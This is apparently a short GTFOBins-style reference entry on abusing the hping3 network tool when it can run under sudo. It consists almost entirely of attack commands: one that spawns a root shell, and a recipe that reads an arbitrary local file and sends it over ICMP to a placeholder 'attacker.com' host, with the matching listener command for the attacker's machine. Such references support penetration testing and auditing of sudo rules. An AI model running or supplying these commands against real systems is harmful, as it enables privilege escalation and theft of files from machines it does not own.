***** Sudo *****
If the binary is allowed to run as superuser by sudo, it does not drop the
elevated privileges and may be used to access the file system, escalate or
maintain privileged access.
    * sudo hping3
      /bin/sh
    * The file is continuously sent, adjust the --count parameter or kill the
      sender when done. Receive on the attacker box with:
      sudo hping3 --icmp --listen xxx --dump
      RHOST=attacker.com
      LFILE=file_to_read
      sudo hping3 "$RHOST" --icmp --data 500 --sign xxx --file "$LFILE"
